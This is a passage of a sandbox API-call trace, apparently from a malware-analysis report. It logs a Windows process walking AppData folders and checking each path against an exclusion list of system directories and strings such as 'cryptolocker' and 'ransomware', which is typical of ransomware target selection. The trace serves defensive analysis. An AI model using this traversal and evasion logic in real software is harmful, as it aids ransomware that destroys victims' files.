lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.130] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.130] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.130] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" [0072.130] SetEvent (hEvent=0x3fc) returned 1 [0072.131] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3e62068a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x3e62068a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0072.131] StrCmpW (psz1="Temp", psz2=".") returned 1 [0072.131] StrCmpW (psz1="Temp", psz2="..") returned 1 [0072.131] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Temp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system32\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Temp" [0072.131] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0072.131] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0072.131] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0072.131] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0072.131] StrCmpW (psz1="TileDataLayer", psz2=".") returned 1 [0072.131] StrCmpW (psz1="TileDataLayer", psz2="..") returned 1 [0072.131] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="TileDataLayer", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system32\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\TileDataLayer" [0072.131] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0072.131] StrCmpW (psz1="UNP", psz2=".") returned 1 [0072.131] StrCmpW (psz1="UNP", psz2="..") returned 1 [0072.131] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="UNP", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system32\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\UNP" [0072.132] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0072.132] StrCmpW (psz1="VirtualStore", psz2=".") returned 1 [0072.132] StrCmpW (psz1="VirtualStore", psz2="..") returned 1 [0072.132] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="VirtualStore", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system32\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.132] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\VirtualStore" [0072.132] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0072.132] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0072.132] GetProcessHeap () returned 0xe30000 [0072.132] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf508 | out: hHeap=0xe30000) returned 1 [0072.132] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0072.132] StrCmpW (psz1="LocalLow", psz2=".") returned 1 [0072.132] StrCmpW (psz1="LocalLow", psz2="..") returned 1 [0072.132] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0072.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0072.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="LocalLow", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system32\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\local\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\boot\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\perflogs\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\programdata\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\drivers\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\wsus\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="crypt_detect") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="cryptolocker") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="ransomware") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\WINDOWS") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files") returned 0x0 [0072.133] GetProcessHeap () returned 0xe30000 [0072.133] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xecf508 [0072.133] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0072.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*" [0072.133] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0072.133] StrCmpW (psz1=".", psz2=".") returned 0 [0072.134] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.134] StrCmpW (psz1="..", psz2=".") returned 1 [0072.134] StrCmpW (psz1="..", psz2="..") returned 0 [0072.134] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0072.134] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0072.134] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0072.134] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0072.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0072.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Adobe", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Adobe" [0072.134] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.134] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.134] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.134] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xaf813748, ftLastAccessTime.dwHighDateTime=0x1d5d80b, ftLastWriteTime.dwLowDateTime=0xaf813748, ftLastWriteTime.dwHighDateTime=0x1d5d80b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0072.134] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0072.134] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0072.134] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0072.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0072.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Mozilla", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\local\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Mozilla" [0072.135] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0072.135] StrCmpW (psz1="Sun", psz2=".") returned 1 [0072.135] StrCmpW (psz1="Sun", psz2="..") returned 1 [0072.135] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0072.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0072.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Sun", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\local\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Sun" [0072.135] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0072.135] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0072.135] GetProcessHeap () returned 0xe30000 [0072.135] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf508 | out: hHeap=0xe30000) returned 1 [0072.135] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe60e657f, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe60e657f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0072.135] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0072.135] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0072.135] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0072.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0072.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Roaming", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.135] StrStrIW 